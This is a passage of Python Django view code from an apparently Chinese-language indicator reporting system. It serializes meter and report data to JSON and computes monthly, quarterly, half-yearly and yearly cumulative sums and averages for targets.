todayvalue = round(data.todayvalue, data.target.digit)\n except:\n pass\n try:\n judgevalue = round(data.judgevalue, data.target.digit)\n except:\n pass\n try:\n curvalue = round(data.curvalue, data.target.digit)\n except:\n pass\n try:\n curvaluedate = data.curvaluedate.strftime('%Y-%m-%d %H:%M:%S') if data.curvaluedate else \"\",\n except:\n pass\n if data.target.cumulative in ['1', '2', '3', '4', '5']:\n try:\n cumulativemonth = round(data.cumulativemonth, data.target.digit)\n except:\n pass\n try:\n cumulativequarter = round(data.cumulativequarter, data.target.digit)\n except:\n pass\n try:\n cumulativehalfyear = round(data.cumulativehalfyear, data.target.digit)\n except:\n pass\n try:\n cumulativeyear = round(data.cumulativeyear, data.target.digit)\n except:\n pass\n yesterday_curvalue = ''\n for yesterdata in yesterday_all_data:\n if yesterdata['target_id'] == data.target_id:\n yesterday_curvalue = round(yesterdata['curvalue'], data.target.digit)\n break\n\n if operationtype in (\"15\", \"16\", \"17\"):\n result.append({\n \"id\": data.id,\n\n \"todayvalue\": todayvalue,\n \"judgevalue\": judgevalue,\n\n \"curvalue\": curvalue,\n \"curvaluedate\": curvaluedate,\n \"curvaluetext\": data.curvaluetext if data.curvaluetext else '',\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear,\n \"releasestate\": data.releasestate,\n \"target_id\": data.target.id,\n \"target_name\": data.target.name,\n \"target_unity\": data.target.unity,\n \"target_code\": data.target.code,\n \"target_businesstype\": data.target.businesstype,\n \"target_unit\": data.target.unit,\n \"target_businesstypename\": businesstypename,\n \"target_unitname\": unitname,\n \"target_datatype\": data.target.datatype,\n \"target_cumulative\": data.target.cumulative,\n \"target_magnification\": data.target.magnification,\n \"target_upperlimit\": data.target.upperlimit,\n \"target_lowerlimit\": data.target.lowerlimit,\n \"target_warn_range\": data.target.warn_range,\n \"yesterday_curvalue\": yesterday_curvalue\n\n })\n elif operationtype == \"1\":\n zerodata = \"{:f}\".format(decimal.Decimal(data.zerodata if data.zerodata else \"0\").normalize())\n twentyfourdata = \"{:f}\".format(\n decimal.Decimal(data.twentyfourdata if data.zerodata else \"0\").normalize())\n metervalue = data.metervalue if data.metervalue else 0\n meterchangedata_id = \"\"\n oldtable_zerodata = \"\"\n oldtable_twentyfourdata = \"\"\n oldtable_value = \"\"\n oldtable_magnification = \"\"\n oldtable_finalvalue = \"\"\n newtable_zerodata = \"\"\n newtable_twentyfourdata = \"\"\n newtable_value = \"\"\n newtable_magnification = \"\"\n newtable_finalvalue = \"\"\n finalvalue = \"\"\n\n cur_meterchange = {}\n for mcd in all_changedata:\n if mcd['meterdata'] == data.id:\n cur_meterchange = mcd\n break\n\n if cur_meterchange:\n meterchangedata_id = cur_meterchange['id']\n oldtable_zerodata = cur_meterchange['oldtable_zerodata']\n oldtable_twentyfourdata = cur_meterchange['oldtable_twentyfourdata']\n oldtable_value = cur_meterchange['oldtable_value']\n oldtable_magnification = cur_meterchange['oldtable_magnification']\n oldtable_finalvalue = cur_meterchange['oldtable_finalvalue']\n newtable_zerodata = cur_meterchange['newtable_zerodata']\n newtable_twentyfourdata = cur_meterchange['newtable_twentyfourdata']\n newtable_value = cur_meterchange['newtable_value']\n newtable_magnification = cur_meterchange['newtable_magnification']\n newtable_finalvalue = cur_meterchange['newtable_finalvalue']\n finalvalue = cur_meterchange['finalvalue']\n if data.target.cumulative in ['1', '2', '3', '4', '5']:\n try:\n oldtable_zerodata = round(oldtable_zerodata, data.target.digit)\n except:\n pass\n try:\n oldtable_twentyfourdata = round(oldtable_twentyfourdata, data.target.digit)\n except:\n pass\n try:\n oldtable_value = round(oldtable_value, data.target.digit)\n except:\n pass\n try:\n oldtable_magnification = round(oldtable_magnification, data.target.digit)\n except:\n pass\n try:\n oldtable_finalvalue = round(oldtable_finalvalue, data.target.digit)\n except:\n pass\n try:\n newtable_zerodata = round(newtable_zerodata, data.target.digit)\n except:\n pass\n try:\n newtable_twentyfourdata = round(newtable_twentyfourdata, data.target.digit)\n except:\n pass\n try:\n newtable_value = round(newtable_value, data.target.digit)\n except:\n pass\n try:\n newtable_magnification = round(newtable_magnification, data.target.digit)\n except:\n pass\n try:\n newtable_finalvalue = round(newtable_finalvalue, data.target.digit)\n except:\n pass\n try:\n finalvalue = round(finalvalue, data.target.digit)\n except:\n pass\n\n result.append({\n \"id\": data.id,\n \"todayvalue\": todayvalue,\n \"judgevalue\": judgevalue,\n \"curvalue\": curvalue,\n \"curvaluedate\": curvaluedate,\n \"curvaluetext\": data.curvaluetext,\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear,\n \"releasestate\": data.releasestate,\n \"target_id\": data.target.id,\n \"target_name\": data.target.name,\n \"target_unity\": data.target.unity,\n \"target_code\": data.target.code,\n \"target_businesstype\": data.target.businesstype,\n \"target_unit\": data.target.unit,\n \"target_businesstypename\": businesstypename,\n \"target_unitname\": unitname,\n \"target_datatype\": data.target.datatype,\n \"target_cumulative\": data.target.cumulative,\n \"target_magnification\": data.target.magnification,\n \"target_upperlimit\": data.target.upperlimit,\n \"target_lowerlimit\": data.target.lowerlimit,\n \"target_warn_range\": data.target.warn_range,\n \"yesterday_curvalue\": yesterday_curvalue,\n\n \"zerodata\": zerodata,\n \"twentyfourdata\": twentyfourdata,\n \"metervalue\": metervalue,\n \"meterchangedata_id\": meterchangedata_id,\n \"oldtable_zerodata\": oldtable_zerodata,\n \"oldtable_twentyfourdata\": oldtable_twentyfourdata,\n \"oldtable_value\": oldtable_value,\n \"oldtable_magnification\": oldtable_magnification,\n \"oldtable_finalvalue\": oldtable_finalvalue,\n \"newtable_zerodata\": newtable_zerodata,\n \"newtable_twentyfourdata\": newtable_twentyfourdata,\n \"newtable_value\": newtable_value,\n \"newtable_magnification\": newtable_magnification,\n \"newtable_finalvalue\": newtable_finalvalue,\n \"finalvalue\": finalvalue,\n\n })\n return JsonResponse({\"data\": result})\n\n\ndef reporting_search_data(request):\n if request.user.is_authenticated():\n\n result = []\n app = request.GET.get('app', '')\n cycletype = request.GET.get('cycletype', '')\n reporting_date = request.GET.get('reporting_date', '')\n searchapp = request.GET.get('searchapp', '')\n works = request.GET.get('works', '')\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n raise Http404()\n all_data = []\n\n # 查询的内容目前为非本应用的有查询权限的查询指标,应该再加上本应用内的非核心业务的指标\n # >> 除本应用核心业务之外的所有指标\n except_works = Work.objects.exclude(state='9').filter(app_id=app, core='是')\n\n curapp = App.objects.get(id=app)\n all_target = Target.objects.exclude(state=\"9\").exclude(work__in=except_works). \\\n filter(cycletype=cycletype).filter(Q(app=curapp) | Q(adminapp=curapp)).order_by(\"adminapp\", \"operationtype\",\n \"sort\")\n\n if searchapp != \"\":\n try:\n cursearchapp = App.objects.get(id=int(searchapp))\n all_target = all_target.filter(adminapp=cursearchapp)\n except:\n pass\n\n if works != \"\":\n try:\n works = int(works)\n all_target = all_target.filter(work_id=works)\n except Exception as e:\n print(e)\n\n for target in all_target:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\", \"todayvalue\": \"\",\n \"judgevalue\": \"\", \"curvalue\": \"\",\n \"curvaluedate\": \"\", \"curvaluetext\": \"\", \"cumulativemonth\": \"\", \"cumulativequarter\": \"\",\n \"cumulativehalfyear\": \"\", \"cumulativeyear\": \"\", \"releasestate\": \"\"}\n if target.operationtype == \"15\":\n targetvalue = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\",\n \"curvalue\": targetvalue[0].curvalue, \"todayvalue\": targetvalue[0].todayvalue,\n \"judgevalue\": targetvalue[0].judgevalue,\n \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n elif target.operationtype == \"16\":\n targetvalue = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\",\n \"todayvalue\": targetvalue[0].todayvalue,\"judgevalue\": targetvalue[0].judgevalue,\n \"curvalue\": targetvalue[0].curvalue, \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n elif target.operationtype == \"17\":\n targetvalue = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": \"\", \"twentyfourdata\": \"\", \"metervalue\": \"\",\n \"todayvalue\": targetvalue[0].todayvalue,\"judgevalue\": targetvalue[0].judgevalue,\n \"curvalue\": targetvalue[0].curvalue, \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n elif target.operationtype == \"1\":\n targetvalue = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target=target, datadate=reporting_date)\n if len(targetvalue) > 0:\n curtargetdata = {\"target\": target, \"zerodata\": targetvalue[0].zerodata,\n \"twentyfourdata\": targetvalue[0].twentyfourdata,\n \"metervalue\": targetvalue[0].metervalue, \"todayvalue\": targetvalue[0].todayvalue,\n \"judgevalue\": targetvalue[0].judgevalue,\n \"curvalue\": targetvalue[0].curvalue,\n \"curvaluedate\": targetvalue[0].curvaluedate,\n \"curvaluetext\": targetvalue[0].curvaluetext,\n \"cumulativemonth\": targetvalue[0].cumulativemonth,\n \"cumulativequarter\": targetvalue[0].cumulativequarter,\n \"cumulativehalfyear\": targetvalue[0].cumulativehalfyear,\n \"cumulativeyear\": targetvalue[0].cumulativeyear,\n \"releasestate\": targetvalue[0].releasestate}\n all_data.append(curtargetdata)\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n for data in all_data:\n businesstypename = data[\"target\"].businesstype\n\n try:\n if businesstypename:\n for dict in all_dict_list:\n if businesstypename == str(dict['id']):\n businesstypename = dict['name']\n break\n except:\n pass\n unitname = data[\"target\"].unit\n try:\n if unitname:\n for dict in all_dict_list:\n if unitname == str(dict['id']):\n unitname = dict['name']\n break\n except:\n pass\n cumulativemonth = \"\"\n cumulativequarter = \"\"\n cumulativehalfyear = \"\"\n cumulativeyear = \"\"\n curvalue = \"\"\n todayvalue = \"\"\n judgevalue = \"\"\n\n if data[\"target\"].datatype == \"numbervalue\":\n todayvalue = data[\"todayvalue\"]\n try:\n todayvalue = round(data[\"todayvalue\"], data[\"target\"].digit)\n except:\n pass\n judgevalue = data[\"judgevalue\"]\n try:\n judgevalue = round(data[\"judgevalue\"], data[\"target\"].digit)\n except:\n pass\n curvalue = data[\"curvalue\"]\n try:\n curvalue = round(data[\"curvalue\"], data[\"target\"].digit)\n except:\n pass\n elif data[\"target\"].datatype == \"date\":\n curvalue = \"\"\n try:\n curvalue = data[\"curvaluedate\"].strftime('%Y-%m-%d %H:%M:%S') if data[\"curvaluedate\"] else \"\"\n except:\n pass\n elif data[\"target\"].datatype == \"text\":\n curvalue = data[\"curvaluetext\"]\n if data[\"target\"].cumulative in ['1', '2', '3', '4', '5']:\n try:\n cumulativemonth = round(data[\"cumulativemonth\"], data[\"target\"].digit)\n except:\n pass\n try:\n cumulativequarter = round(data[\"cumulativequarter\"], data[\"target\"].digit)\n except:\n pass\n try:\n cumulativehalfyear = round(data[\"cumulativehalfyear\"], data[\"target\"].digit)\n except:\n pass\n try:\n cumulativeyear = round(data[\"cumulativeyear\"], data[\"target\"].digit)\n except:\n pass\n result.append({\n \"todayvalue\": todayvalue,\n \"judgevalue\": judgevalue,\n \"curvalue\": curvalue,\n \"cumulativemonth\": cumulativemonth,\n \"cumulativequarter\": cumulativequarter,\n \"cumulativehalfyear\": cumulativehalfyear,\n \"cumulativeyear\": cumulativeyear,\n \"target_id\": data[\"target\"].id,\n \"target_name\": data[\"target\"].name,\n \"target_unity\": data[\"target\"].unity,\n \"target_code\": data[\"target\"].code,\n \"target_businesstype\": data[\"target\"].businesstype,\n \"target_unit\": data[\"target\"].unit,\n \"target_businesstypename\": businesstypename,\n \"target_unitname\": unitname,\n \"target_datatype\": data[\"target\"].datatype,\n \"target_cumulative\": data[\"target\"].cumulative,\n \"target_magnification\": data[\"target\"].magnification,\n \"target_upperlimit\": data[\"target\"].upperlimit,\n \"target_lowerlimit\": data[\"target\"].lowerlimit,\n\n \"zerodata\": data[\"zerodata\"],\n \"twentyfourdata\": data[\"twentyfourdata\"],\n \"metervalue\": data[\"metervalue\"],\n \"releasestate\": data[\"releasestate\"]\n })\n return JsonResponse({\"data\": result})\n\n\ndef getcumulative(tableList, target, date, value):\n \"\"\"\n 数据累计\n 求和\n 算术平均\n 加权平均\n 非零算数平均\n 求和(上月)(环保专用)\n \"\"\"\n cumulativemonth = value\n cumulativequarter = value\n cumulativehalfyear = value\n cumulativeyear = value\n\n def get_last_cumulative_data(tableList, tmp_target, tmp_date):\n \"\"\"\n 找到指标指点时间点的月累计值、季累计值、半年累计值、年累计值\n :param tableList:\n :param tmp_target:\n :param tmp_date:\n :return:\n \"\"\"\n lastcumulativemonth = 0\n lastcumulativequarter = 0\n lastcumulativehalfyear = 0\n lastcumulativeyear = 0\n\n lastg_date = datetime.datetime.strptime('2000-01-01', \"%Y-%m-%d\")\n # 周期类型 =>\n # 昨日\n # 上个月末\n # 上个季度末\n # 上个半年末\n # 上个年末\n if tmp_target.cycletype == \"10\":\n lastg_date = tmp_date + datetime.timedelta(days=-1)\n if tmp_target.cycletype == \"11\":\n lastg_date = tmp_date.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n if tmp_target.cycletype == \"12\":\n month = (tmp_date.month - 1) - (tmp_date.month - 1) % 3 + 1 # 10\n newdate = datetime.datetime(tmp_date.year, month, 1)\n lastg_date = newdate + datetime.timedelta(days=-1)\n if tmp_target.cycletype == \"13\":\n month = (tmp_date.month - 1) - (tmp_date.month - 1) % 6 + 1 # 10\n newdate = datetime.datetime(tmp_date.year, month, 1)\n lastg_date = newdate + datetime.timedelta(days=-1)\n if tmp_target.cycletype == \"14\":\n lastg_date = tmp_date.replace(\n month=1, day=1, hour=0, minute=0, second=0, microsecond=0\n ) + datetime.timedelta(days=-1)\n\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n all_data = queryset.exclude(state=\"9\").filter(target=tmp_target, datadate=lastg_date)\n if len(all_data) > 0:\n try:\n if lastg_date.year == tmp_date.year and lastg_date.month == tmp_date.month:\n lastcumulativemonth += all_data[0].cumulativemonth\n except:\n pass\n try:\n if lastg_date.year == tmp_date.year and (lastg_date.month - 1) - (lastg_date.month - 1) % 3 == (\n tmp_date.month - 1) - (tmp_date.month - 1) % 3:\n lastcumulativequarter += all_data[0].cumulativequarter\n except:\n pass\n try:\n if lastg_date.year == tmp_date.year and (lastg_date.month - 1) - (lastg_date.month - 1) % 6 == (\n tmp_date.month - 1) - (tmp_date.month - 1) % 6:\n lastcumulativehalfyear += all_data[0].cumulativehalfyear\n except:\n pass\n try:\n if lastg_date.year == tmp_date.year:\n lastcumulativeyear += all_data[0].cumulativeyear\n except:\n pass\n\n return lastcumulativemonth, lastcumulativequarter, lastcumulativehalfyear, lastcumulativeyear\n\n lastcumulativemonth, lastcumulativequarter, lastcumulativehalfyear, lastcumulativeyear \\\n = get_last_cumulative_data(tableList, target, date)\n\n def get_lm_last_cumulative_data(tmp_target, tmp_date):\n \"\"\"\n 获取累计类型为求和(上月)(环保专用)指标的累计时间推迟一个月\n \"\"\"\n lm_lastcumulativemonth = 0\n lm_lastcumulativequarter = 0\n lm_lastcumulativehalfyear = 0\n lm_lastcumulativeyear = 0\n\n lastg_date = datetime.datetime.strptime('2000-01-01', \"%Y-%m-%d\")\n if tmp_target.cycletype == \"11\":\n lastg_date = tmp_date.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n # 上月份为12月,取去年表数据\n if lastg_date.month == 12:\n lm_tableyear = str(lastg_date.year)\n lm_tableList = {\n \"Entrydata\": getmodels(\"Entrydata\", lm_tableyear),\n \"Meterdata\": getmodels(\"Meterdata\", lm_tableyear),\n \"Extractdata\": getmodels(\"Extractdata\", lm_tableyear),\n \"Calculatedata\": getmodels(\"Calculatedata\", lm_tableyear)\n }\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = lm_tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = lm_tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = lm_tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = lm_tableList[\"Calculatedata\"].objects\n all_data = queryset.exclude(state=\"9\").filter(target=tmp_target, datadate=lastg_date)\n else:\n all_data = queryset.exclude(state=\"9\").filter(target=tmp_target, datadate=lastg_date)\n\n if len(all_data) > 0:\n try:\n if tmp_date.month in [1, 3, 4, 6, 7, 9, 10, 12]:\n lm_lastcumulativequarter += all_data[0].cumulativequarter\n except:\n pass\n try:\n if tmp_date.month in [1, 3, 4, 5, 6, 7, 9, 10, 11, 12]:\n lm_lastcumulativehalfyear += all_data[0].cumulativehalfyear\n except:\n pass\n try:\n if tmp_date.month != 2:\n lm_lastcumulativeyear += all_data[0].cumulativeyear\n except:\n pass\n else:\n pass\n return lm_lastcumulativemonth, lm_lastcumulativequarter, lm_lastcumulativehalfyear, lm_lastcumulativeyear\n\n lm_lastcumulativemonth, lm_lastcumulativequarter, lm_lastcumulativehalfyear, lm_lastcumulativeyear \\\n = get_lm_last_cumulative_data(target, date)\n\n def get_sum_cumulative_data(tableList, tmp_target, tmp_start_date, tmp_date):\n \"\"\"\n 算数平均\n 求和:指标在此时间范围\n \"\"\"\n last_sum_data = 0\n lastg_date = tmp_date + datetime.timedelta(days=-1)\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n # 根据时间范围, 查出所有数据求和\n range_date = (tmp_start_date, lastg_date)\n all_data = queryset.exclude(state=\"9\").filter(datadate__range=range_date).filter(target=tmp_target)\n if len(all_data) > 0:\n try:\n last_sum_data = all_data.aggregate(Sum('curvalue'))[\"curvalue__sum\"]\n except:\n pass\n return last_sum_data\n\n def get_sum_cumulative_exclude_zero(tableList, tmp_target, tmp_start_date, tmp_date):\n \"\"\"\n 非零算数平均\n 求和:指标在此时间范围(去除0)\n \"\"\"\n last_sum_data = 0\n day_count = 0\n\n lastg_date = tmp_date + datetime.timedelta(days=-1)\n\n queryset = tableList[\"Entrydata\"].objects\n operationtype = tmp_target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n # 根据时间范围, 查出所有数据求和(去除0)\n range_date = (tmp_start_date, lastg_date)\n all_data = queryset.exclude(state=\"9\").filter(datadate__range=range_date).filter(target=tmp_target).exclude(curvalue='0')\n if len(all_data) > 0:\n try:\n last_sum_data = all_data.aggregate(Sum('curvalue'))[\"curvalue__sum\"]\n day_count = int(len(all_data))\n except:\n pass\n return last_sum_data, day_count\n\n cumulative = target.cumulative\n weight_target = target.weight_target\n\n if cumulative == '1': # 求和\n cumulativemonth = lastcumulativemonth + value\n cumulativequarter = lastcumulativequarter + value\n cumulativehalfyear = lastcumulativehalfyear + value\n cumulativeyear = lastcumulativeyear + value\n\n if cumulative == '5': # 求和(上月)(环保专用)\n cumulativemonth = lm_lastcumulativemonth + value\n cumulativequarter = lm_lastcumulativequarter + value\n cumulativehalfyear = lm_lastcumulativehalfyear + value\n cumulativeyear = lm_lastcumulativeyear + value\n\n if cumulative == '2': # 算术平均,保留位数\n if target.cycletype == \"10\":\n # 日报\n yestoday_date = date + datetime.timedelta(days=-1)\n if date.year == yestoday_date.year:\n # 当月昨天天数、当季到昨天的天数、半年到昨天的天数、当年到昨天的天数\n def get_days(start_time, end_time):\n return int(\n (end_time.replace(hour=0, minute=0, second=0, microsecond=0) - start_time.replace(\n day=1, hour=0, minute=0, second=0, microsecond=0\n )).total_seconds() / (60 * 60 * 24)\n ) + 1\n\n # 1.月累计\n ms_date = date.replace(day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ms_date, date)\n # 判断是否是当月的第一天,当月第一天等于当前值\n if date.day == 1:\n cumulativemonth = value\n else:\n cumulativemonth = (last_sum_data + value) / date.day\n\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n days_in_quarter = get_days(ss_date, yestoday_date)\n last_sum_data = get_sum_cumulative_data(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (1, 4, 7, 10):\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (days_in_quarter + 1)\n\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n days_in_halfyear = get_days(hs_date, yestoday_date)\n last_sum_data = get_sum_cumulative_data(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month in (1, 7):\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (days_in_halfyear + 1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n days_in_year = get_days(ys_date, yestoday_date)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n cumulativeyear = (last_sum_data + value) / (days_in_year + 1)\n else:\n pass\n if target.cycletype == \"11\":\n # 月报\n if date.month > 1:\n # 2.季累计\n month = (date.month - 1) - (date.month - 1) % 3 + 1\n ss_date = datetime.datetime(date.year, month, 1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ss_date, date)\n # 判断是否是当季的第一天,当季第一天等于当前值\n if date.day == 1 and date.month in (4, 7, 10):\n cumulativequarter = value\n else:\n cumulativequarter = (last_sum_data + value) / (date.month-ss_date.month+1)\n\n # 3.半年累计\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data = get_sum_cumulative_data(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.day == 1 and date.month == 7:\n cumulativehalfyear = value\n else:\n cumulativehalfyear = (last_sum_data + value) / (date.month-hs_date.month+1)\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n cumulativeyear = (last_sum_data + value) / (date.month - ys_date.month + 1)\n else:\n pass\n if target.cycletype == \"12\":\n # 季报\n if date.month > 3:\n # 3.半年上个月所在月份(区分前/后半年)\n month = (date.month - 1) - (date.month - 1) % 6 + 1\n hs_date = datetime.datetime(date.year, month, 1)\n last_sum_data = get_sum_cumulative_data(tableList, target, hs_date, date)\n # 判断是否是半年的第一天,半年第一天等于当前值\n if date.month == 9:\n day = 1\n elif date.month == 6 or date.month == 12:\n day = 2\n cumulativehalfyear = (last_sum_data + value) / day\n\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n if date.month == 6:\n day = 2\n elif date.month == 9:\n day = 3\n elif date.month == 12:\n day = 4\n cumulativeyear = (last_sum_data + value) / day\n\n if target.cycletype == \"13\":\n if date.month > 6:\n # 半年报\n # 4.年累计\n ys_date = date.replace(month=1, day=1)\n last_sum_data = get_sum_cumulative_data(tableList, target, ys_date, date)\n cumulativeyear = (last_sum_data + value) / 2\n if target.cycletype == \"14\":\n # 年报均为当前值\n pass\n if cumulative == '3': # 加权平均\n if not weight_target:\n raise Exception('未配置加权指标。')\n # 加权指标当前值\n wt_value = 0\n try:\n wt_target_id = target.weight_target_id\n queryset = tableList[\"Entrydata\"].objects\n operationtype = target.operationtype\n if operationtype == \"1\":\n queryset = tableList[\"Meterdata\"].objects\n if operationtype == \"15\":\n queryset = tableList[\"Entrydata\"].objects\n if operationtype == \"16\":\n queryset = tableList[\"Extractdata\"].objects\n if operationtype == \"17\":\n queryset = tableList[\"Calculatedata\"].objects\n\n wt_calculatedata = queryset.exclude(state=\"9\").filter(datadate=date).filter(target_id=wt_target_id)[0]\n wt_value = wt_calculatedata.curvalue\n except Exception as e:\n print(e)\n\n wt_lastcumulativemonth, wt_lastcumulativequarter, wt_lastcumulativehalfyear, wt_lastcumulativeyear \\\n = get_last_cumulative_data(tableList, weight_target, date)\n if target.cycletype == \"10\":\n # 日报:\n yestoday_date = date + datetime.timedelta(days=-1)\n if date.year == yestoday_date.year:\n if date.day > 1: # 日报月初月累计为当前值\n cumulativemonth = (lastcumulativemonth * wt_lastcumulativemonth + value * wt_value) / (\n wt_lastcumulativemonth + wt_value\n )\n if not (date.month % 3 == 1 and date.day == 1): # 判断是否所在季度第一天\n cumulativequarter = (lastcumulativequarter * wt_lastcumulativequarter + value * wt_value) / (\n wt_lastcumulativequarter + wt_value\n )\n if not (date.month % 3 == 1 and date.day == 1): # 判断是否所在季度第一天\n cumulativehalfyear = (lastcumulativehalfyear * wt_lastcumulativehalfyear + value * wt_value) / (\n wt_lastcumulativehalfyear + wt_value\n )\n cumulativeyear = (cumulativeyear * lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"11\":\n # 月报\n if date.month > 1:\n last_month_date = date.replace(day=1, hour=0, minute=0, second=0, microsecond=0) + \\\n datetime.timedelta(days=-1)\n if date.month > 3: # 不是第一个季度\n last_month_on_quarter = last_month_date.month % 3\n else:\n last_month_on_quarter = last_month_date.month\n if last_month_on_quarter > 0: # 任何一季度首月季累计为当前值\n cumulativequarter = (lastcumulativequarter * wt_lastcumulativequarter + value * wt_value) / (\n wt_lastcumulativequarter + wt_value\n )\n if date.month != 7: # 不是半年第一月\n cumulativehalfyear = (lastcumulativehalfyear * wt_lastcumulativehalfyear + value * wt_value) / (\n wt_lastcumulativehalfyear + wt_value\n )\n cumulativeyear = (lastcumulativeyear + wt_lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"12\":\n # 季报\n if date.month > 3: # 非第一季度\n cumulativequarter = (lastcumulativequarter * wt_lastcumulativequarter + value * wt_value) / (\n wt_lastcumulativequarter + wt_value\n )\n if date.month in [4, 5, 6, 10, 11, 12]: # 半年后季\n cumulativehalfyear = (lastcumulativehalfyear * wt_lastcumulativehalfyear + value * wt_value) / (\n wt_lastcumulativehalfyear + wt_value\n )\n cumulativeyear = (lastcumulativeyear * wt_lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"13\":\n if date.month > 6:\n cumulativeyear = (lastcumulativeyear * wt_lastcumulativeyear + value * wt_value) / (\n wt_lastcumulativeyear + wt_value\n )\n if target.cycletype == \"14\":\n pass\n if cumulative == '4': # 非零算术平均\n if target.cycletype == \"10\":\n # 日报\n yestoday_date = date + datetime.timedelta(days=-1)\n if date.year == yestoday_date.year:\n # 1.月累计\n ms_date = date.replace(day=1)\n last_sum_data, day_count = get_sum_cumulative_exclude_zero(tableList, target, ms_date, date)\n # 判断是否是当月的第一天,当月第一天等于当前值\n if date.day == 1:\n cumulativemonth = value\n else:\n if value == 0:\n if day_count != 0:\n cumulativemonth = (last_sum_data + value) / day_count\n 